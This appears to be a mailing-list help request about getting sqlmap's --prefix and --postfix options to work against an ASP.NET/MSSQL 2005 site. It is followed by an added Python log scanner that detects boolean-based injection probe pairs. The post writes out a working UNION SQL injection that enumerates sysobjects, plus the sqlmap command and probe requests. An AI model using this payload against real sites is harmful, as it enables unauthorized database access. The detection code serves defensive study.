Greetings,
I have been manually testing a site built with ASP.NET running MSSQL Server
2005 and identified a GET parameter vulnerable to injection. The site
returns *Microsoft OLE DB Provider for ODBC Drivers error '80040e14'* through
*[Microsoft][SQL Server Native Client 10.0][SQL Server]* for illegal
queries. The query is a little awkward and I'm having a hard time with
specifying *--prefix* and *--postfix* correctly to use sqlmap for this
injection.
My valid injection: http:// www.thesite.com/page.asp?p1=string*)')* union
select 1,name COLLATE Latin1_General_CI_AS,3,4,5,6,7 from dbo.sysobjects *--*
The 2nd column is the only one to return output.
This is what I did with sqlmap:
./sqlmap --url www.thesite.com/page.asp?p1=string -p p1 --prefix \)\'\)
--postfix "--"
While testing my custom query, sqlmap does the following:
GET /page.asp?p1=string)') AND 967=967 -- HTTP/1.1
GET /page.asp?p1=string)') AND 967=968 -- HTTP/1.1
The query selects the options into a <select> field. Both requests are 200
OK, while both fail to select anything into the <select> field. Thus, sqlmap
directly moves on to the predefined tests.
Any suggestions?
Kerem Gunes
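
From the defending side, the paired probes quoted in the message (`AND 967=967` followed by `AND 967=968`, both answered with 200 OK) cannot be spotted by status code, but the request pair itself is a recognisable pattern in web-server logs. The following is an added example, not part of the original post and not sqlmap's code; the log format, the sample lines, the regular expressions and the function name `find_boolean_probe_pairs` are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# A numeric comparison appended with AND/OR, e.g. "AND 967=967" or "AND 967=968".
PROBE = re.compile(r"\b(AND|OR)\s+(\d+)\s*=\s*(\d+)", re.IGNORECASE)
# Assumed (simplified) log format: <client> "GET <target> HTTP/1.x" <status>
REQUEST = re.compile(r'^(\S+) "GET (\S.*?) HTTP/1\.[01]"')

# Constructed sample lines; addresses come from documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 "GET /page.asp?p1=string HTTP/1.1" 200',
    "198.51.100.7 \"GET /page.asp?p1=string)') AND 967=967 -- HTTP/1.1\" 200",
    '198.51.100.7 "GET /page.asp?p1=string%29%27%29%20AND%20967%3D968%20-- HTTP/1.1" 200',
    '203.0.113.9 "GET /search.asp?q=salt+and+pepper HTTP/1.1" 200',
    '203.0.113.9 "GET /page.asp?p1=x AND 1=1 HTTP/1.1" 200',
]


def find_boolean_probe_pairs(log_lines):
    """Return sorted (client, request template) keys for which the same client
    sent both a true and a false numeric comparison to the same URL."""
    outcomes = defaultdict(set)  # (client, masked target) -> {True, False}
    for line in log_lines:
        request = REQUEST.match(line)
        if not request:
            continue
        client = request.group(1)
        target = unquote_plus(request.group(2))  # decode %xx and '+' first
        probe = PROBE.search(target)
        if not probe:
            continue  # ordinary request, or "and" used as a plain word
        # Mask the numbers so the true and false variants share one key.
        masked = PROBE.sub(lambda p: p.group(1).upper() + " N=N", target)
        template = " ".join(masked.split())  # collapse stray whitespace
        outcomes[(client, template)].add(int(probe.group(2)) == int(probe.group(3)))
    # A lone "1=1" is weak evidence; the true/false pair is the signal.
    return sorted(key for key, seen in outcomes.items() if seen == {True, False})


if __name__ == "__main__":
    for client, template in find_boolean_probe_pairs(SAMPLE_LOG):
        print(f"boolean-based probe pair from {client}: {template}")
```
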